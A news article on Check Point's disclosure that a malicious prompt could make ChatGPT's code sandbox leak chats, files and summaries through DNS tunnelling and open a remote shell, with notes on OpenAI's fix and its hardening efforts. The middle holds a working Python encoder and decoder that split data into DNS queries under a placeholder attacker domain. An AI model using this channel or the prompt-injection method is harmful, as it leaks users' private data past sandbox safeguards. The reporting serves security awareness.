A newly disclosed security flaw in ChatGPT exposed a basic weakness in the way users think about “safe” AI workspaces: data that appeared to be confined inside a chat could, under the right conditions, be siphoned out without any warning. The issue was described on March 30 by Check Point Research, which said a malicious prompt could turn an ordinary conversation into a covert exfiltration channel capable of leaking user messages, uploaded files and model-generated summaries. Independent reporting said OpenAI fixed the problem on February 20 and that there is no evidence it was exploited maliciously.
What makes the disclosure significant is not only the technical mechanics but the trust model it challenges. ChatGPT presents outbound sharing of sensitive information as restricted and subject to safeguards, particularly inside its code-execution and data-analysis environment. Check Point said it found a path around those protections by exploiting a hidden communication route from the isolated runtime to the public internet, allowing information to leave the environment without triggering a visible approval flow. That matters because many users now place contracts, financial records, medical documents and other sensitive material inside AI systems in the belief that the runtime boundary is hard.
According to the researchers, the attack did not require a complex sequence of actions from the victim. A single malicious prompt, they said, could prime the conversation so that later messages became a source of leakage. The data taken did not have to be entire files. The prompt could instead direct the model to extract only the most valuable parts of a conversation or document, such as identifying details, financial conclusions, legal summaries or medical assessments. That selective approach would make exfiltration harder to notice and potentially more useful to an attacker.
The technical route described by Check Point centred on DNS tunnelling. While the runtime blocked normal outbound internet access, DNS resolution remained available as part of normal system operation. The researchers said data could be encoded into DNS-safe fragments and sent out through hostname lookups, while small instructions could be returned through DNS responses, creating a bidirectional side channel. In practical terms, that turned ordinary resolver traffic into a hidden transport path between the sandboxed runtime and an attacker-controlled server. Security researchers have long regarded this class of problem as difficult because it exploits infrastructure that is often treated as benign or essential.
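To make the mechanism concrete, the following is a minimal, hypothetical sketch of how DNS tunnelling encodes data for exfiltration. It is not Check Point's actual proof of concept: the domain name, chunk size and hex encoding are illustrative assumptions. Stolen data is hex-encoded, split into DNS labels of at most 63 characters, and wrapped into hostnames under an attacker-controlled zone; resolving those names leaks the payload to the attacker's nameserver, which logs the queries and reassembles them.

```python
# Illustrative sketch of DNS-tunnelling encoding (hypothetical details; the
# domain, chunk size and encoding are assumptions, not the researchers' code).
import textwrap

ATTACKER_DOMAIN = "exfil.example.com"  # hypothetical attacker-controlled zone


def encode_queries(data: bytes, chunk: int = 60) -> list[str]:
    """Encode data into DNS-safe hostnames under ATTACKER_DOMAIN."""
    hexed = data.hex()                     # hex stays within the DNS charset
    labels = textwrap.wrap(hexed, chunk)   # each DNS label must be <= 63 chars
    # A sequence-number prefix lets the receiving nameserver reorder chunks.
    return [f"{i}-{label}.{ATTACKER_DOMAIN}" for i, label in enumerate(labels)]


def decode_queries(queries: list[str]) -> bytes:
    """Reassemble the payload from logged query names (receiver side)."""
    parts = {}
    for name in queries:
        first = name.split(".", 1)[0]       # e.g. "3-6c6561..." -> seq + hex
        seq, _, payload = first.partition("-")
        parts[int(seq)] = payload
    return bytes.fromhex("".join(parts[i] for i in sorted(parts)))


queries = encode_queries(b"account: 1234, balance: 9876")
# In a real attack, each hostname would then be resolved (for example with
# socket.gethostbyname), so the data transits ordinary resolver traffic that
# the sandbox permits; DNS responses can carry small return instructions.
```

Because the lookups travel through the resolver infrastructure the runtime relies on anyway, this traffic is hard to distinguish from legitimate name resolution, which is why the class of flaw is considered difficult to close.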
Check Point went further, saying the same pathway could support remote shell access inside the Linux container used for code execution. That raised the severity of the issue from passive leakage to the possibility of active command execution within the runtime. The researchers said commands sent through this side channel would bypass the usual conversational safety mediation because the results could go directly back to the attacker rather than appearing in the chat. Even as a proof of concept, that finding will sharpen scrutiny of AI sandboxes that promise isolation while still relying on background network functions to operate.
OpenAI’s broader security posture suggests the company already views prompt injection and data exfiltration as a central risk area. In February, it introduced Lockdown Mode and elevated-risk labels in ChatGPT, saying the setting was designed to constrain how the assistant interacts with external systems and reduce prompt-injection-based leakage. Days later, it also launched a safety bug bounty programme that explicitly includes third-party prompt injection and data exfiltration among the issues it wants researchers to report. Those moves do not prove anticipation of this exact flaw, but they show the company has been hardening controls around the same threat category.
The episode also fits a wider pattern across the AI industry. Security work published this year argues that prompt injection should be treated as a first-class vulnerability rather than a niche quirk of chatbots. A January systematic analysis of agentic coding assistants said modern AI tools that browse, read files, execute commands and connect to outside systems create an expanded attack surface that traditional defences struggle to contain. OWASP already ranks prompt injection at the top of its risk list for LLM applications, while policy and standards discussions increasingly frame indirect prompt injection as one of generative AI’s hardest security problems to solve cleanly.